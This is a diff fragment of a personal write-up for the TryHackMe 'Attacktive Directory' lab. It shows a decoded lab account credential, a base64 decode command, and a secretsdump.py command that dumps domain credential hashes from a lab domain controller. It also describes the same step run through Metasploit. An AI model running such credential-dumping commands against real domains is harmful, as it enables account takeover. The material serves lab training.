FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com/attacktivedirectory.md

     [+] Decoded from Base64 : backup@spookysec.local:backup2517860
     ```

+## Elevating Privileges within the Domain

 Now that we know this is Base64 we can run this command to read the content: ```echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d```

-Running secretsdump.py didn't work for me e.g.:
+Running secretsdump.py didn't work for me e.g.: ```secretsdump.py spookysec.local/backup:backup2517860@10.10.12.33 -use-vss```

-secretsdump.py spookysec.local/backup:backup2517860@10.10.12.33 -use-vss

-So i used metasplot und set lhost, SMBDomain, RHOSTS,  SMBPass and SMBUser:
+So i used metasploit with secretsdump.py und set lhost, SMBDomain, RHOSTS, SMBPass and SMBUser accordingly: ```msfconsole```

 ??? output "metasplot with secretsdump.py"
     ```txt